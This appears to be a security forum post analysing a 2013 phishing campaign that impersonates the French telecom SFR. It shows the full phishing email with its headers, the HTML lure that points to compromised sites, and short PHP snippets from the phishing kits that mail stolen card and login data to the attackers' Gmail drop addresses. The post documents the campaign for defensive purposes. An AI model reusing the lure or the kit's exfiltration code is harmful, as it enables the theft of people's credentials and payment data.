redirector:
http://www.phishtank.com/phish_detail.p ... id=1751290
phishs:
http://www.phishtank.com/phish_detail.p ... id=1751315
http://www.phishtank.com/phish_detail.p ... id=1751304
http://www.phishtank.com/phish_detail.p ... id=1751292
Mail source:
Code: Select allx-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 82.98.167.163) smtp.mailfrom=service@sfr_mail.fr; dkim=none header.d=sfr_mail.fr; x-hmca=none
X-SID-PRA: service@sfr_mail.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: 12l2I64mAZSWFhQ0inhVxAVzsjGYsff35aXkapIX2Y6BZyPYPlOgB2x+8Zs0JUukQfjv9xb6BSycqMBDNxV0SdiqJZrh0t9KDyMvDPT1gQL4NVYW8z+yFT6SYxcLl2bzgiwNRBgGeKUkoooYSA2Rs+mY5cOQkwJN
Received: from vl403.dinaserver.com ([82.98.167.163]) by COL0-MC1-F18.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
Fri, 1 Mar 2013 09:15:17 -0800
Received: by vl403.dinaserver.com (Postfix, from userid 30007)
id BA54E19EB46; Fri, 1 Mar 2013 18:15:07 +0100 (CET)
To: *******************@hotmail.fr
Subject: PV: FA53-TNG12-UT9
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Service Clients <service@sfr_mail.fr>
Message-Id: <20130301171507.BA54E19EB46@vl403.dinaserver.com>
Date: Fri, 1 Mar 2013 18:15:07 +0100 (CET)
X-DinaScanner-Information: DinaScanner. Filtro anti-Spam y anti-Virus
X-MailScanner-ID: BA54E19EB46.ECE92
X-DinaScanner: Libre de Virus
X-DinaScanner-SpamCheck: no es spam, SpamAssassin (almacenado, puntaje=2.819,
requerido 6, BAYES_00 -2.60, HTML_MESSAGE 0.00,
HTML_MIME_NO_HTML_TAG 0.10, MIME_HTML_ONLY 1.46, NO_RELAYS -0.00,
SUBJ_ALL_CAPS 2.08, URIBL_PH_SURBL 1.79)
X-DinaScanner-SpamScore: 2.82
X-DinaScanner-From: service@sfr_mail.fr
X-Spam-Status: No
Return-Path: service@sfr_mail.fr
X-OriginalArrivalTime: 01 Mar 2013 17:15:18.0254 (UTC) FILETIME=[58E898E0:01CE16A0]
<br><dl style="display:none" class="allheaders"><dt class="fullHeader">Authentication-Results : </dt><dd>sfrmc.priv.atos.fr; dkim=none (no signature);<br> dkim-adsp=none (no policy) header.from=service@box-sfr.fr</dd><br><dt class="fullHeader">Content-type : </dt><dd>text/html; charset=iso-8859-1</dd><br><dt class="fullHeader">Date : </dt><dd>Fri, 22 Feb 2013 17:23:42 -0800 (PST)</dd><br><dt class="fullHeader">From : </dt><dd>"[E-Fact] _1-06MS-4256" <service@box-sfr.fr></dd><br><dt class="fullHeader">MIME-Version : </dt><dd>1.0</dd><br><dt class="fullHeader">Message-Id : </dt><dd><20130223012342.BFEE86BEC1ED@ve.kjk57hr6.vesrv.com></dd><br><dt class="fullHeader">Received : </dt><dd>by ve.kjk57hr6.vesrv.com (Postfix, from userid 33)<br> id BFEE86BEC1ED; Fri, 22 Feb 2013 17:23:42 -0800 (PST)</dd><br><dt class="fullHeader">Received : </dt><dd>from filter.sfr.fr (localhost [64.207.153.29])<br> by msfrf2419.sfr.fr (SMTP Server) with ESMTP id 928791C0009C<br> for <tl2
000000000000000005422450@back10-mail02-02.sfrmc.priv.atos.fr>; Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Received : </dt><dd>from msfrf2419.sfr.fr (msfrf2419 [10.18.29.33])<br> by msfrb1004 (Cyrus v2.3.16) with LMTPA;<br> Sat, 23 Feb 2013 13:20:55 +0100</dd><br><dt class="fullHeader">Received : </dt><dd>from ve.kjk57hr6.vesrv.com (unknown [64.207.153.29])<br> by msfrf2419.sfr.fr (SMTP Server) with ESMTP for <miriam.griffin@sfr.fr>;<br> Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Received : </dt><dd>from ve.kjk57hr6.vesrv.com (unknown [64.207.153.29])<br> by msfrf2419.sfr.fr (SMTP Server) with ESMTP id 854A11C00086<br> for <miriam.griffin@sfr.fr>; Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Return-Path : </dt><dd><www-data@ve.kjk57hr6.vesrv.com></dd><br><dt class="fullHeader">Subject : </dt><dd>Notification de prelevements automatique</dd><br><dt class="fullHeader">To : </dt><d
d>miriam.griffin@sfr.fr</dd><br><dt class="fullHeader">X-PHP-Originat
ing-Script : </dt><dd>33:salton.php(2) : eval()'d code</dd><br><dt class="fullHeader">X-SFR-UUID : </dt><dd>20130223122055431.6972B46DE@msfrf2419.sfr.fr</dd><br><dt class="fullHeader">X-Sieve : </dt><dd>CMU Sieve 2.3</dd><br><dt class="fullHeader">X-sfr-mailing : </dt><dd>LEGIT</dd><br><dt class="fullHeader">X-sfr-spam : </dt><dd>not-spam</dd><br><dt class="fullHeader">X-sfr-spamrating : </dt><dd>40.000000</dd><br></dl></dl></div></div><div class="attachments" dojoattachpoint="attachmentsDiv" style="display:none"><h3>Pièce(s) Jointe(s) :</h3><div class="attachmentsList"><ul dojoattachpoint="attachmentsNode"></ul></div></div><div dojoattachpoint="playerDivNode" style="display:none"></div></div><div class="overflowmails fullmail"><div style="display: none;" class="message_player"></div><div class="messageBody " id="message"><img src="http://www.burococon.nl/administrator/modules/aa11.png" alt="SFR" border="0">
<div></div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="top">
<p style="BORDER-RIGHT: 0pt; PADDING-RIGHT: 0pt; BORDER-TOP: 0pt; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 12px; PADDING-BOTTOM: 0pt; MARGIN: 15px 0pt 0pt; BORDER-LEFT: 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 0pt; BORDER-BOTTOM: 0pt; FONT-FAMILY: Arial">Votre
conseiller sfr</p>
<p style="BORDER-RIGHT: 0pt; PADDING-RIGHT: 0pt; BORDER-TOP: 0pt; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 12px; PADDING-BOTTOM: 0pt; MARGIN: 15px 0pt 0pt; BORDER-LEFT: 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 0pt; BORDER-BOTTOM: 0pt; FONT-FAMILY: Arial">Cordialement,</p>
<p style="PADDING-RIGHT: 0pt; BORDER-TOP: rgb(54,172,2) 2px dotted; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 11px; PADDING-BOTTOM: 5px; MARGIN: 20px 0pt 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 5px; BORDER-BOTTOM: rgb(241,172,2) 2px dotted; FONT-FAMILY: Arial; TEXT-ALIGN: right">
Votre Espace Client <a href="internet-marketing.web.id/wp-load.php" style="FONT-WEIGHT: bold; FONT-SIZE: 11px; COLOR: rgb(54,54,54); FONT-FAMILY: Arial; TEXT-DECORATION: underline" target="_blank">
espace Client</a></p>
<p><img src="http://www.burococon.nl/administrator/modules/aa22.png" alt="" border="0">
Notification de prelevements automatique
service@box-sfr.fr
sfr:
Code: Select all<?php
$send="undomia.result@gmail.com,ayhamox0102030@gmail.com"; // will send the results at this address.
skat:
Code: Select allmail("undomia.result@gmail.com,ayhamox0102030@gmail.com", $subj, $msg);
visa:
Code: Select allmail("ayhamox0102030@gmail.com",$subj,$msg,$from);
Backdoors:
http://www.kernelmode.info/forum/viewto ... =20#p18402